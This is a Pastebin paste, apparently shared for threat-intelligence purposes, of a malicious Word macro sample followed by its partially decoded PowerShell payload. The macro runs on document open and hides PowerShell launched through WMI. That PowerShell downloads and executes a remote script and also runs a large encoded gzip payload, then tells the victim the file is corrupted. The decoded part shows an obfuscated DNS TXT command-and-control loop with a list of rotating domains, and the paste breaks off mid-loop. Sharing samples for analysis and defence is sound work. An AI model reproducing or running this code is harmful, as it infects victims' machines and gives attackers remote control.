SHARE
TWEET

[DOC/PS1 threat] Uploaded by @JohnLaTwC

a guest Feb 16th, 2017 3,028 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ## uploaded by @JohnLaTwC
  2. ## 340795d1f2c2bdab1f2382188a7b5c838e0a79d3f059d2db9eb274b0205f6981
  3.  
  4.  
  5. ## macro
  6.  
  7. Sub Document_Open()
  8.     Parsing
  9. End Sub
  10.  
  11. Public Function ParsingA() As Variant
  12.     Const word = 0
  13.     strComputer = "."
  14.     Set objWMIService = GetObject("w" & "" & "in" & "" & "mgm" & "" & "ts" & "" & ":" & "" & "\" & strComputer & "\r" & "" & "oot\c" & "" & "imv" & "" & "2")
  15.  
  16.     Set objStartup = objWMIService.Get("W" & "" & "in" & "" & "32_" & "" & "Pro" & "" & "ces" & "" & "sS" & "" & "tar" & "" & "tu" & "" & "p")
  17.     Set objConfig = objStartup.SpawnInstance_
  18.     objConfig.ShowWindow = word
  19.     Set objProcess = GetObject("wi" & "" & "nmg" & "" & "mts" & "" & ":" & "" & "\" & strComputer & "\" & "" & "r" & "" & "oo" & "" & "t\" & "" & "c" & "" & "im" & "" & "v2:W" & "" & "in" & "" & "32_" & "" & "Pro" & "" & "ce" & "" & "ss")
  20.                        
  21.     mStr = ""
  22.     mStr = mStr & "powershell -C ""IEX (New-Object System.Net.WebClient).DownloadString('http://pastebin.com/raw/sxPYz7fT')"""
  23.  
  24.     objProcess.Create mStr, Null, objConfig, intProcessID
  25.    
  26.     Selection.WholeStory
  27.     Selection.Delete Unit:=wdCharacter, Count:=1
  28.     Selection.TypeText Text:="File is corrupted."
  29.  
  30. End Function
  31.  
  32.          Public Function Parsing() As Variant
  33.             Const word = 0
  34.             strComputer = "."
  35.             Set objWMIService = GetObject("w" & "" & "in" & "" & "mgm" & "" & "ts" & "" & ":" & "" & "\\" & strComputer & "\r" & "" & "oot\c" & "" & "imv" & "" & "2")
  36.          
  37.             Set objStartup = objWMIService.Get("W" & "" & "in" & "" & "32_" & "" & "Pro" & "" & "ces" & "" & "sS" & "" & "tar" & "" & "tu" & "" & "p")
  38.             Set objConfig = objStartup.SpawnInstance_
  39.             objConfig.ShowWindow = word
  40.             Set objProcess = GetObject("wi" & "" & "nmg" & "" & "mts" & "" & ":" & "" & "\\" & strComputer & "\" & "" & "r" & "" & "oo" & "" & "t\" & "" & "c" & "" & "im" & "" & "v2:W" & "" & "in" & "" & "32_" & "" & "Pro" & "" & "ce" & "" & "ss")
  41.                        
  42. lStr = ""
  43. lStr = lStr & "powershell -ep bypass -C ""$data = [System.Convert]::FromBase64String('H4sIAAAAAAAEAO1da3PayNL+7l+hol"
  44. lStr = lStr & "J1cG0MJPbuJpvyqXeEwSYxtmWDHRP2dbCQZWxArCSsOHv8309fZnRD4EvYPWsl2dooAmmmp/vpy/TMNCsX07HpD5yxdgZ/ypvd8i"
  45. lStr = lStr & "b8D//Bv4sv/oS/4Z6+4X+U71ZX/tTwC3yiy5/jW3faprZnBWv751eW6WtHt55vjUqN/VLTGjnu7ZHvWr3RuxWN2+zKnqiZua9Wnd"
  46. lStr = lStr & "HEtTwPyCttdwYTbqSY1ftL7VP2e7F/N52+9ftvv6lPViU1XW6JSIL/5lLDvZ+4A99yi1nDmNdgid6Zw81571SHjmcV+esyv8QP4C"
  47. lStr = lStr & "NIYxYXSi1HuG7vlt5zLX/qjkO+VJ3xjeX6wICWo/c865cNGNBgbBez2of371YiaDDdZdkVPAMY+FQd9YeWrw/GfWxl9XftoOeCdF"
  48. lStr = lStr & "agx2Dgm5e/K2HLRss88ruXs0/Qd2VmSbdMT1BjFrL6wPEGRMamVnmpNXvjfs8HRCELWu7UWv0d26OhcHv0p0x9MrXz23v1kPZUM9"
  49. lStr = lStr & "0zyZ/57b1+aHtdJfHF7a0/cLxlKR0W0Pz2NlLt1XtDL9EgNhdaAAnUuxVtVaJQ2QcGHaGw+KllffFLtbHpIA4AXu3xAP5tlbYtXy"
  50. lStr = lStr & "LsU4S9uuuMEuj713uh/yp2muI00G/F9rUwhV4RW474GIgbUQ/gql+I6htxYOgmXj8K/nw34Hv6fKciGkK8FVUhGrYYiC1PbBnig6"
  51. lStr = lStr & "gawgr0r2K7KUxbn4gdIfpC/CLqb5Ltxu4/CrjC/W4A7XH/1O6BIWxRE9CouBZVW5wEeltst4WF9FY3xKGhT7Gf80C/xnGc2/pY1C"
  52. lStr = lStr & "ti38b+2ng/ib5vi11b38FrX+gtsWMwfdsbohMIR9Q9YQT6Dd73bX0odhr4XB/5sm/r23gP7fii1hCnBo6vLfZsURH1Jj53G/YPdL"
  53. lStr = lStr & "4P9IHYMYVhw3O1mjgM9Cu8doS+jte+oeuiZoqmgCu008b7rQq8Jyaiei0+GMJDPn4Q+rmoG6Jj6BtIL9BfR/pOiU5D9Gj8pvhowH"
  54. lStr = lStr & "iBzmO6vw6/7xhiiv3A+5l0Aj+3xPYbvH+NdAA/KiH/aqd4D+1UcByXiBdo7zUKuR3Ac8AP1T/IZyy2gV+BXsXnDAP4vGXj9UrUa/"
  55. lStr = lStr & "i+i+M2AuAXXIE+HfnYpGsN5QzyNnHcNP7d5yfvHo3P1n/B65HQj/F6YvP4lLxbeA35ZCB/SO4w/rGUO4w/EO8F03cskC4b9QfkSO"
  56. lStr = lStr & "O7QnkBjuQ4QnqP8b5nhN8PiV8Bvp8lL8BVjfg0FTuniI9bfE7h6NDG8QEuDKBzuyZMbGfrVOxl8RHkxuOkcdE490U4Tl3stHGcDe"
  57. lStr = lStr & "KPAXJBvciPvF9Lee9F8m5gv8QH0utagHJS8pZ6kQ95mwl5txnP+ZS3suevpT3v4LUl4PsQ9zbbtec9zo4c5ys5TvJfp7Z+SOOUuO"
  58. lStr = lStr & "4EcVybLO/tZm5wTX4Z5EnjrDt8zSeue1LeX6S892Scchj5LZv1GuIJwvmzj1MM9r9bNbbHtQpem/g9vL8u7TnFa897nDX0P1Vsj3"
  59. lStr = lStr & "F7zfEY6+srOU49Hpc+9zgE8L5OfknGW+Sf8h2HDGQc4kp53kTxdV71t4HjAf1tSL9DeO7Jaz5xLf2vwjXHW0a+4y2aN4ovUp6HOY"
  60. lStr = lStr & "231DhvE/prx/ME+dNf8ktbcj5Uv2b9zbNfshm3VkJ/mzw/zKv+Ujwlvkp5vpd+aZxnXFNcue3F5kO590vr8XxHL/gOcE3zJRHE7X"
  61. lStr = lStr & "Uyz5c3XDelvT6V+Suy2+y38orrQMYZiXlELc95gCtpr18ncG3kOQ5pSnu9wfLkOORayjWvuF6P8ni2OJLyzLG9vpL2Wq3DufmPrw"
  62. lStr = lStr & "2eH+8Ittec/8m1ve4IzttaCVw385z3YTsVzY9VfJ3jOMRIrjfU24zrHM8bOzLfsSdi+Q61XyCfuB7KfOaNlGc9//F1m+PrHRVfC5"
  63. lStr = lStr & "435jgOgfcT64ltI/fzxqHcB7PBcYiga8fIN6478XxIrc3rT/nG9TjK09s4f9IlHx6Ea7j+KgBCVVsf4fM0zh2SK+GwIffJRfvoeL"
  64. lStr = lStr & "+c2pdH+/R4P9FbeXXkfrz7n6fPw+/fIv8bqGeMz4rYtkXLhnEjLgXyC+gTuod0076/HbX/T/B7cE90Jvf1yXu1/4/7p/1/sf2E8/"
  65. lStr = lStr & "cnPq69/QBEBSyAdu2QD4p/6r0YH+i92P0F7j/cIroGotqIjY9xZBm6lBe2L7gfoLdD9zaOg+QOeuaI2gbgDz+voFyHcpwxPgqxS7"
  66. lStr = lStr & "gBvEp6SU9Q/kLfR32F9n3CG9ElEC+x8RFds/RkyCPad6n2dSp+xu5j8vhA8WVbnFB7DaQf7F2AenOD+g34CCT9X3A8rEfXOO6fcR"
  67. lStr = lStr & "7SQXzBONhOS/kqORLf0/tLY5+rK9Mzi0egBz6/FVsb4j3Gw1Xiiy12EL9sl8/RDuB8APm3k7Z7RHeA+t1H+tjuTeW+VuVnrrC/Ux"
  68. lStr = lStr & "wX2MOmAPsL/G9Svw3sL7b/NeL7xax8hsg3siNpOe3Mvr8E3Dq47g9+8ZTHg3hrIj9u0K71AsSXYFztEF+HEtcVlJ+J9EI7fcH+Js"
  69. lStr = lStr & "KRshvp/cHK7sT2CcP1AvkD/Tdt8ZOonoom0gd2A/jxBj8nfgBfOgbbu130p0n7SnoD9Fzi533BdJ7bjEflJ8BeOGSnbfQHAvAmAp"
  70. lStr = lStr & "ITrq9hf7aY1Q/AVZrvCp+RvmTsf47JAe6j/cpPlReOL0AcBmjvichH4Q/GdxLAeOtpu0e4Az6e8j7qp9kBn/TCYH4DXZNH4jdzP/"
  71. lStr = lStr & "is3U7yOcavOfyN8TMmp/Q+8wsD/DwQq+IAwNcR4gT0/5r9O/O/ZSC+bOS/T3bZCO34r4/fv36N8RnFIX2MN6DfDwbi8h47kcAjvk"
  72. lStr = lStr & "92ieRvzciV5WlSnovimgD7gTgok64EX2PyjtmLJ/ntE4x/VFwJfGxjfIh6KzheJPzUKojfDbK76Ne2pX16kjwxXpJxL8dJFeT3Ry"
  73. lStr = lStr & "Op30n7m4qDlJ2K9aviINXfPL48VG8uhH7A/h/Gn463EzhI62cyjkvIMU33A/TzB26+ATfAH6JvJ4oL0vFLGjezcgN7oOSt9Bvk3Z"
  74. lStr = lStr & "fz1T7J/w37s20Z97Pdqch5j5RnMr6L6Mj2w1F8H9qr2LkajCNh3oV2j9brndD/Nmh+c434oHjonOaN1/AcXiv4nI/0Aj9+jnDdRj"
  75. lStr = lStr & "n5KftGuMjE7TxcxeLOFs27TbTXB7i+3rPDOM7Gfi0ZJxA9INcjfA6uPG+neIHoMsn/XPM8j+eDPTmvUPO4IfmD1HwpMy5N8Jfle0"
  76. lStr = lStr & "Hzc4F+egHfmpwvAP9H/UEcBs8pud/zvb4XzmfD+XjW84CTefxfMI5EPLME/qt5dgf9KcjhWM7jVNz24Ym4+JDSU8J/+pxaIv6MyY"
  77. lStr = lStr & "nt2lukL0FPWs+WwD/w+1tyfkTzjw9z2p1npyJ7GcNhen78aL3fwDwK5VVNymvUQH6I9+tkvJhh77JxPT9vwv08IC8WH0fajsf8UA"
  78. lStr = lStr & "wXb+P0KjvdwfMKnAerRHouWF8Ar4w3Nf98SL4iGd/P4iqpJ4/lz+PySkY4/8rE/zOw/5l6ndZTpQesPx9lXFKR+vMk+ewKzpPszs"
  79. lStr = lStr & "yjld4tsO8c30zpnIvMF1IeJ60v0O454Q/0XaTjoUePu0X5QkN3Ucgwv/NknmeO3ZuJM+ad112C3O/zX3R+huZ3afv/4an8ID/jYX"
  80. lStr = lStr & "s/y7zNENsDPr0XtTfSzpIeBbK/r/icypfe933LUHnxMH9cIxxnxQ8ZcrdScXpEf3Y8GsXL+j6tOwQY377B/Qh/yH4pP7ZgvKl4Be"
  81. lStr = lStr & "expHfXnLdS8Uv2fGbe/Jri4gV+Lz0fyfTXaf+UmGcl/XDG/Jn8kxpXh/Jwb6TeGRn+k+UC/HkV5YGicUf9ZMfnig8XUb797T15d4"
  82. lStr = lStr & "/oCXj9iPFM8rmU60Iyj4B4R//G8eB7mrdXcDzpfFbse3rPj/IRBusZ3NM6hcrDc383pH+pdYzdOflilR9OzP+y9amN+YUY/xWdZO"
  83. lStr = lStr & "/70g5buP6Vzm+l9TYjz3WRsl/kL3au4/KczcthPs/mPOV5vF8VF6TzxOn5Znr+DvMt0BNPrltl5MmfNK6n6vMD+R36/1vOqyvcPK"
  84. lStr = lStr & "91sWMjue/sWK738vqgI88B0PrYkTyHF8T3tZzI8y/HIv5+Ozw/n1wnpXiM7EMH88DpOCmdR1kcZ6bXUeiazt8B30a8TiIun4jTh+"
  85. lStr = lStr & "dTWQ8nlK+ZzfO+nYPr770eR0euvyfqcShccR2KJu+zUedTIJ7LTX0Gud8ieV5f7uvm9fktua/7Su4r+8rr1IzbZ70Poe7I84JtuR"
  86. lStr = lStr & "/S4/X3jLokJwk7JeuzPO99J534uWbA23GE+5zuO1Hy3rblfgs6330pz7kn69BI/T8XuatD8zUu71zvM1LyDvfP2bk/dxXaqXgdqf"
  87. lStr = lStr & "p1/Lz/d2DPxXdz/vtEnbNL1JHK9bmNRF2SsJ5Wrs8j/ajXYcp6OznG9Y96Hd+BvU7X6zg2vpd6HUl73RH5xnU7ges3jOscn7NTuO"
  88. lStr = lStr & "bzSCbvbwd7neNzdrKOhf5z/NwG4C2/82fANeVlt5rJOCTf9prikF68rlC+6/6pepa3iXPROcc11/0TSXud4/NILE+w1zKfGctv5x"
  89. lStr = lStr & "XXso5Fqn6pkee6Q3IdjeuzKFx3cj1vlHUszu34Obtcx9dX8frDal0033VaZX2WrWZ83Sbv5/25rraMr8+D3NtrWccirJuv6ljkOM"
  90. lStr = lStr & "8n67Nw/eEovs5xHNJJ1e2kfAivV+QX11xPqyLleSXX4XJsr9ty3VXlr9u5j69VHYueiK/DOXmOQ1QdC0/G14f5nzeq+ix2fH15mH"
  91. lStr = lStr & "Ncj+P5kEO5Xy/XuN5OrDd2pL1+6LwxvX969hz5Y/fZLWvf3jy6lvj7X08aJ8gPcCvli+djSU7TcP8z12XYo3NKpB+0L9aX+yyfdN"
  92. lStr = lStr & "70A9oNxhedF6LzXpnn5WPtx/ZxJupRZNeniH4PbWY/p4l+YsJ1Dmb29T72PP3sfv7M81Mz9SCCLDz87+uWzD2nnBr3vPN9M+ec0v"
  93. lStr = lStr & "uzH1s3R9aV4H37p9KeqnPJcD/h8yVLO0c9kHyd5TvXMZl/jjyz3kvWPuB76o8srh8ze+4os97HjB5G9ixRD2Nx3Rfehyfrryw+Zz"
  94. lStr = lStr & "FdXn2JRliPpBUwfgHXab+Tic/ZOi/fwC+ur/QEPtP5TsaFPNe5QM+dJ+tTlc7/fXmO5xBOVbwu90H34/tN0v78CfrB5+ZqHG9yPR"
  95. lStr = lStr & "dPnudT9ZG+RufLNvhckOLjA+og9GQcHKuD8BX3NTfRri/wl3sGEM31YuaMi6+Krr6UG9UDepx9oToWUX2Gb8XX3PNTT5JP7JxGRh"
  96. lStr = lStr & "0p4t8U5cPnhWj8HtpL5n8Nn6vNtdMx/3gfnxf7udm6CYnznelzLOp8Xiz+SNQtWlinia9c38wIzz2yfSX8/cX2NkMOC/g2z86qcz"
  97. lStr = lStr & "Hnst5Xdtx0Pz4y44yM88LpOGsJccYDzgFuLC9utxfwMaMeVmZcnK5/kj7/GjvHm3kuNHGuLn1eKsQ5vXeB/dfeME7QPqb8xAJ5Z9"
  98. lStr = lStr & "a9egTdUdzKdXVIzw05T/mGeUKs3dk6NvPOzcbqjSzFvsziJSNuVXoQk+ORoddF3X4yHhbgKzVvTp/TT57PT9arnF8f7AH8/HZ9eA"
  99. lStr = lStr & "Qf728vbTfT89xUXZRAuPfEJek4pLXkOOQVxhfq+4x6Tety3veg85QL+b7U+JXjxHOsuzeTF5oTP8+dl5O9GUR1D7ysvMIcP5aMpx"
  100. lStr = lStr & "LfQ/x7Sv6xCfPpeJ2WxHn4xPsdGSedyvjFMpLvzeN7R8oN/HlmPSx1pffE5ua/Vlflz9Tzr9Pzn26Zf6beGt/8NnEd2+2N+j2/99"
  101. lStr = lStr & "O3/2496MFHKR+KS/oYh8ToODsjKrpMT7fcJTq+udteoMpN8vS5GWA5SVILYm+cDWXZcxmJ+Gu779uItmbYPfR7RiM/kxfsvpAlnc"
  102. lStr = lStr & "+/ZRFbWNEGF0Vshx7Db8vc2J22Zv2hvWi5Uwt6+pP7KnflX/g09zV07IHJcsD3uF1q7E6T7W5yo9R29Ck1pYi5ky3wB3JUm/xpmS"
  103. lStr = lStr & "nrnklRI9H0eVc+yd8iNXtWsLZ/fmWZvnZkmVN34N+WDoCj5mDSG5ZOBuO+E3jhB0Xt0/ynGn1r7MM3IB6QWXXqunBfXF3VFMdm+i"
  104. lStr = lStr & "81vMb40BlaxQXN6tPB0OfHoGXRHw3GA893e77jrjLH/QTHiafMurPyksB1JPRdLHHTwil1nabaIyqxGnDKpYMmlE3+lUypf6WpOy"
  105. lStr = lStr & "2pBFhKaxK6iB06wmGiyerTVL3BJTygvWOZoo+VjNmMA1dKOwLucx4aep0GV/erK/Nwt6JZQ8/6G4TZFMdLG/HfJKRlkvyNQiKLJK"
  106. lStr = lStr & "0O/08j/WSGg2g5jbG//rr4ovji4OjYcr2BM271zodWKbwtNXtXjvuf/am/xgNdLbXcwaiIfSgbm+5jzfa116TsnqmtHfT8y2zPun"
  107. lStr = lStr & "bcG04t+o5MtLLjaCKxN6s3ynaFK1rvYQ1nGPdFDaexLY106AMIKFnU/qQVPo8LcMnqciV850yqipSEdA2hJyhvFrM6BU6iB2j41u"
  108. lStr = lStr & "jAdSYguttw8Bnqt7bXG1nateWOreH6a3hSvtO6nVgayzDN+QRdaxeOa1oKQd+BP4pJkiV7t/kXhToQwB/avHCmCkiitr5bCWOKbh"
  109. lStr = lStr & "Qr/JVUqOmSGfC0htLRMvwEauxgNAB0WjcgjDpw0nK1tTGgypv0TEtzHcfvetNzz3QHEx9shPYf7dAaOTfW2slowMCQbVSd0ag37u"
  110. lStr = lStr & "8OxlYNGwNavekIm9t7SnNnZxdEje+YsqFzkDcB+rHtMcOlyToLPdeR5eNTjbHn98bQ2BqMYDKFLnH4PBGo7jcP2q3a4Z5o1uL9fr"
  111. lStr = lStr & "u0TFkkCrBh0mKRwWFxIkmmikJKaQGFw57nAWtqcWkJ1wb2jH1P+78/yR5sZgL9nUZvRYNYhiNMDAMc2BHm8uunWLueAaYZU8u93e"
  112. lStr = lStr & "2N7WnPXk6fx7Rvh52fbH8p7bZT9fxhfvmHnJfehvXWeV7+XipUReY9r2gfWRDWk4xEV2vzPg9et+f1dJk35vyoQEWl/Eaffgegzf"
  113. lStr = lStr & "W1qiJcP+zIdaYjg38HgT7nfUdDuT7wFeloUJ0Bk9vdaoIM9Avk0zn+LigHD63ZusIm8TF0XNKhsaei6VHhIc5fudiumkDBM89ax+"
  114. lStr = lStr & "Zbs0x1m7XooG5fwGf5GGKRA18GRI0A48058WO6tDFDwAwhwan5deRAW75HvqCOKRqG/jlxin7qYoqpr48Cf9qBUhYqDnXkkoVHuQ"
  115. lStr = lStr & "RKvbSlKsZ41rJGk2HPR+YUqr91pavuHt16ENmsv1YfHDiB5R5dWsNh9+ZVqdKd4L2H9yXrC6CFHzvyb4eWtjPoQwAB8tE+Fxq1j9"
  116. lStr = lStr & "rnF0XgGgBq7IM0FoaIC8LAeLT7uVAAPZirCEvs1IFOPe60sKLJ2EvpD9nreI/24gB4UfT8/6nxcWflxPA40PvEsiktQKh+61teMY"
  117. lStr = lStr & "vYVck2Di8lGXIKUo1NQRJoziIEG/LMS7/nXXsEgXJdK5swPoBS2R9HoW7Zd7XCQ+BiZRJW0MowX3HGgz48Wh5o65XEfCByoCpg55"
  118. lStr = lStr & "Ch8PlFP8arBapKMHlgGL9aUsNafff5xchLhd3cV2O/1ITIxr1lcdODpRMIia0iEPVSq7wEqPRLu9bY9i+5ndKRZV0XKy8rqxAWIQ"
  119. lStr = lStr & "72psMhfGPO7QGts2t5NBnc7gwm3FcRG3sZjjr1XOzfTQAKMGPLMuVnSIfnzuuNWz+0en3LLSJZ+LgPT+NLJfiu7zvWuF9cfceK4B"
  120. lStr = lStr & "eUdsYYKHXlEfCdlSyi7vHTroOe69875ZoBkZpy3WdmHgcgpCU0JT/88A8//Pf44SwMSy/6cCv+99GVbfSfrW6cnfEUsOUordDVFD"
  121. lStr = lStr & "muHHKeuJk5D0a0SI3azDQed+A7MFwZg++ILbXI9RD57N0q+Ew0XFmMf0dcjnnXB00n5hvHZYd9aDax3YI56gNMAT6WeekgLDTn/I"
  122. lStr = lStr & "rQB11XCb7sw4qfC58LJ5x0KBEc8YNV7d+Z61kcdmX0oFovudOxhi1E8J4Ty5AlA0c7cYYD81Y7v50gDgDy2YD/XHhZ0f69iKrFXi"
  123. lStr = lStr & "+ZOH9EsrEQMHMyey5EPvDbjITshF7O7uhHkPcjyPvHBnlPDfF+2Krvx1bN97cko4Wkv7tLO95/1g4IGkHmEtvncSap8M7d3UrYsY"
  124. lStr = lStr & "z1y90lhGF9Csg5F/rPay7cySw4q76MuDPgHysxVZNrsxto+LMk8v4a9tNPM2/Rkdp1mRr38Kc2dvEnFRQfCzc3hSX0RcdwY8faLL"
  125. lStr = lStr & "rH9Pv/nrn/BcWzSyNlqQAA');$ms=New-Object System.IO.MemoryStream;$ms.Write($data,0,$data.Length);$ms.S"
  126. lStr = lStr & "eek(0,0)|Out-Null;$cs = New-Object System.IO.Compression.GZipStream($ms,[System.IO.Compression.Compr"
  127. lStr = lStr & "essionMode]::Decompress);$sr=New-Object System.IO.StreamReader($cs);$t=$sr.readtoend();IEX $t;"""
  128. lStr = lStr & ""
  129.            
  130.             objProcess.Create lStr, Null, objConfig, intProcessID
  131.            
  132.          End Function
  133.  
  134. ## decoded with https://github.com/JohnLaTwC/PyPowerShellXray to:
  135.  
  136. powershell -ep bypass -C "$data = [System.Convert]::FromBase64String('
  137. function ____/=\/==\/\/\_/=(${_/===\___/====\__/})
  138. { ${_/\_/=\_/=====\/=} = New-Object System.IO.MemoryStream;
  139.  ${_/==\/=\/==\_/\_/} = New-Object System.IO.Compression.GZipStream(${_/\_/=\_/=====\/=}, [System.IO.Compression.CompressionMode]::Compress);
  140.  ${_/\/=\_/=\/=\/\/\} = New-Object System.IO.StreamWriter(${_/==\/=\/==\_/\_/});
  141.  ${_/\/=\_/=\/=\/\/\}.Write(${_/===\___/====\__/});
  142.  ${_/\/=\_/=\/=\/\/\}.Close();
  143.  ${/=\___/\_/=\/\/=\} = ${_/\_/=\_/=====\/=}.ToArray();
  144.  return [System.Convert]::ToBase64String(${/=\___/\_/=\/\/=\});
  145. }
  146. function _/===\_/\_/====\/\
  147. { [CmdletBinding()] Param(
  148.  [Switch]
  149.  ${_/===\/\/=\/\___/=},
  150.  [Switch]
  151.  ${_/==\/\__/==\__/\/},
  152.  [Parameter(Position = 0, Mandatory = $True)]
  153.  [String]
  154.  ${______/\/\/=====\/},
  155.  [Parameter(Position = 1, Mandatory = $True)]
  156.  [String]
  157.  ${_/=====\/\__/=\/\/},
  158.  [Parameter(Position = 2, Mandatory = $True)]
  159.  [String]
  160.  ${_/===\_/\/=\_/\/\/},
  161.  [Parameter(Position = 3, Mandatory = $True)]
  162.  [String]
  163.  ${____/=\_/\_/\_/===},
  164.  [Parameter(Position = 4, Mandatory = $False)]
  165.  [String]${__/==\/\/\____/===}
  166.  )
  167.  ${/=\/=\/==\/=\_/==} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('${script:_/\__/=\/\/\/\/=\} = "";
  168.  
  169. ${script:___/=\___/\__/=\_} = @($('olgw.my')),$('oloqd.pw')),$('dsud.com')),$('dpoo.pw')),$('dosdkd.mo')),$('dlox.pw')),$('oof.pw')),$('cnkmoh.pw')),$('dtxf.pw')),$('gjcu.pw')),$('wuc.pw')),$('ihrs.pw')),$('kjko.pw')),$('ldzp.pw')),$('lvxf.pw')),$('mjot.pw')),$('mut.pw')),$('mvzo.pw')),$('mxfg.pw')),$('nroq.pw')),$('nwrr.pw')),$('odwf.pw')),$('okiq.pw')),$('otzd.pw')),$('qznm.pw')),$('rnkj.pw')),$('rzzc.pw')),$('sgvt.pw')),$('soru.pw')),$('swio.pw')),$('tijm.pw')),$('tsrs.pw')),$('turp.pw')),$('vpuo.pw')),$('vxwy.pw')),$('xhqd.pw')),$('yomd.pw')),$('yodq.pw')),$('yqox.pw')),$('zdqp.pw')),$('zjvz.pw')));
  170.  
  171. function ____/==\/\/\/=====(${_/==\/\/\/===\/=\/}, $AuthNS=$null)
  172.  
  173. {
  174.  
  175.  ${___/=\___/\__/=\_} = ${script:___/=\___/\__/=\_};
  176.  
  177.  ${_____/\/\/=\_/\/=} = ""
  178.  
  179.  try{
  180.  
  181.    if ($AuthNS -ne $null -AND $AuthNS -ne 0)
  182.  
  183.    {
  184.  
  185.      ${_____/\/\/=\_/\/=} = (IEX "nslookup -querytype=txt ${_/==\/\/\/===\/=\/} $AuthNS" 2>&1 ) | select-string -pattern "$([char]0x0022)";
  186.  
  187.    }
  188.  
  189.    else
  190.  
  191.    {
  192.  
  193.      ${_____/\/\/=\_/\/=} = (IEX "nslookup -querytype=txt ${_/==\/\/\/===\/=\/}" 2>&1 ) | select-string -pattern "$([char]0x0022)";
  194.  
  195.    }
  196.  
  197.    ${_____/\/\/=\_/\/=} = ${_____/\/\/=\_/\/=} -split("$([char]0x0022)")[0];
  198.  
  199.    if(${_____/\/\/=\_/\/=} -eq "")
  200.  
  201.    {
  202.  
  203.      ${script:_/\__/=\/\/\/\/=\} = ${___/=\___/\__/=\_}[(Get-Random -Maximum (${___/=\___/\__/=\_}).count)];
  204.  
  205.    }
  206.  
  207.  }
  208.  
  209.  catch{
  210.  
  211.    ${script:_/\__/=\/\/\/\/=\} = ${___/=\___/\__/=\_}[(Get-Random -Maximum (${___/=\___/\__/=\_}).count)];
  212.  
  213.  }
  214.  
  215.  ${_/====\__/===\__/} = ${_____/\/\/=\_/\/=}|Out-String;
  216.  
  217.  if(${_/====\__/===\__/} -eq "")
  218.  
  219.  {
  220.  
  221.    ${script:_/\__/=\/\/\/\/=\} = ${___/=\___/\__/=\_}[(Get-Random -Maximum (${___/=\___/\__/=\_}).count)];
  222.  
  223.  }
  224.  
  225.  return ${_/====\__/===\__/};
  226.  
  227. }
  228.  
  229. function enc($txt)
  230.  
  231. {
  232.  
  233.  ${_/\/\/\/==\/==\__} = New-Object System.IO.MemoryStream;
  234.  
  235.  ${/===\__/\/\/\/\/=} = New-Object System.IO.Compression.GZipStream(${_/\/\/\/==\/==\__}, [System.IO.Compression.CompressionMode]::Compress);
  236.  
  237.  ${/=\/\/==\/===\_/\} = New-Object System.IO.StreamWriter(${/===\__/\/\/\/\/=});
  238.  
  239.  ${/=\/\/==\/===\_/\}.Write($txt);
  240.  
  241.  ${/=\/\/==\/===\_/\}.Close();
  242.  
  243.  ${_/\__/=\_/\___/\/} = ${_/\/\/\/==\/==\__}.ToArray();
  244.  
  245.  return [System.Convert]::ToBase64String(${_/\__/=\_/\___/\/});
  246.  
  247. }
  248.  
  249. function dec($txt)
  250.  
  251. {
  252.  
  253.  ${___/\_/\/\/==\/=\} = [System.Convert]::FromBase64String($txt);
  254.  
  255.  ${_/\/\/\/==\/==\__} = New-Object System.IO.MemoryStream;
  256.  
  257.  ${_/\/\/\/==\/==\__}.Write(${___/\_/\/\/==\/=\}, 0, ${___/\_/\/\/==\/=\}.Length);
  258.  
  259.  $null = ${_/\/\/\/==\/==\__}.Seek(0,0);
  260.  
  261.  ${/===\__/\/\/\/\/=} = New-Object System.IO.Compression.GZipStream(${_/\/\/\/==\/==\__}, [System.IO.Compression.CompressionMode]::Decompress);
  262.  
  263.  ${/======\_/=\___/\} = New-Object System.IO.StreamReader(${/===\__/\/\/\/\/=});
  264.  
  265.  ${/=\_/=====\__/\/\} = ${/======\_/=\___/\}.readtoend();
  266.  
  267.  return ${/=\_/=====\__/\/\};
  268.  
  269. }
  270.  
  271. function logic($startdomain, $cmdstring, $commanddomain, $stopstring, $AuthNS)
  272.  
  273. {
  274.  
  275.  [System.Threading.Mutex]${____/==\__/\/=\_/};
  276.  
  277.  try
  278.  
  279.  {
  280.  
  281.    [bool]${_/\_/===\/\___/\/} = $false;
  282.  
  283.    ${____/==\__/\/=\_/} = New-Object System.Threading.Mutex($true, $('SourceFireSux')), [ref] ${_/\_/===\/\___/\/});        
  284.  
  285.    if (!${_/\_/===\/\___/\/})
  286.  
  287.    {
  288.  
  289.      exit;
  290.  
  291.    }
  292.  
  293.    ${script:___/=\___/\__/=\_} = @($('algew.me')),$('aloqd.pw')),$('dyiud.com')),$('bpee.pw')),$('daskd.me')),$('dlex.pw')),$('doof.pw')),$('cnmah.pw')),$('dtxf.pw')),$('gjcu.pw')),$('gjuc.pw')),$('ihrs.pw')),$('kjke.pw')),$('ldzp.pw')),$('lvxf.pw')),$('mjet.pw')),$('mjut.pw')),$('mvze.pw')),$('mxfg.pw')),$('nroq.pw')),$('nwrr.pw')),$('odwf.pw')),$('okiq.pw')),$('otzd.pw')),$('qznm.pw')),$('rnkj.pw')),$('rzzc.pw')),$('sgvt.pw')),$('soru.pw')),$('swio.pw')),$('tijm.pw')),$('tsrs.pw')),$('turp.pw')),$('vpua.pw')),$('vxwy.pw')),$('xhqd.pw')),$('yamd.pw')),$('yedq.pw')),$('yqox.pw')),$('zdqp.pw')),$('zjvz.pw')));
  294.  
  295.    ${___/=\___/\__/=\_} = ${script:___/=\___/\__/=\_};
  296.  
  297.    ${script:_/\__/=\/\/\/\/=\} = ${___/=\___/\__/=\_}[(Get-Random -Maximum (${___/=\___/\__/=\_}).count)];
  298.  
  299.    ${__/\_/\/=\/=\/=\/} = ""
  300.  
  301.    while($true)
  302.  
  303.    {
  304.  
  305.      ${_/\/\/\__/=\_/\/=} = 0;
  306.  
  307.      if ($AuthNS -ne $null -AND $AuthNS -ne 0)
  308.  
  309.      {
  310.  
  311.        ${/==\/===\/==\___/} = ____/==\/\/\/===== "$startdomain.${script:_/\__/=\/\/\/\/=\}" $AuthNS | Out-String
  312.  
  313.      }
  314.  
  315.      else
  316.  
  317.      {
  318.  
  319.        ${/==\/===\/==\___/} = ____/==\/\/\/===== "$startdomain.${script:_/\__/=\/\/\/\/=\}" | Out-String
  320.  
  321.      }
  322.  
  323.      ${/==\/===\/==\___/}=${/==\/===\/==\___/}.Trim()
  324.  
  325.      if(${/==\/===\/==\___/} -eq $('idle')))
  326.  
  327.      {
  328.  
  329.        start-sleep -seconds $(Get-Random -Minimum 3500 -Maximum 5400)
  330.  
  331.        continue
  332.  
  333.      }
  334.  
  335.      if (${/==\/===\/==\___/} -eq $cmdstring)
  336.  
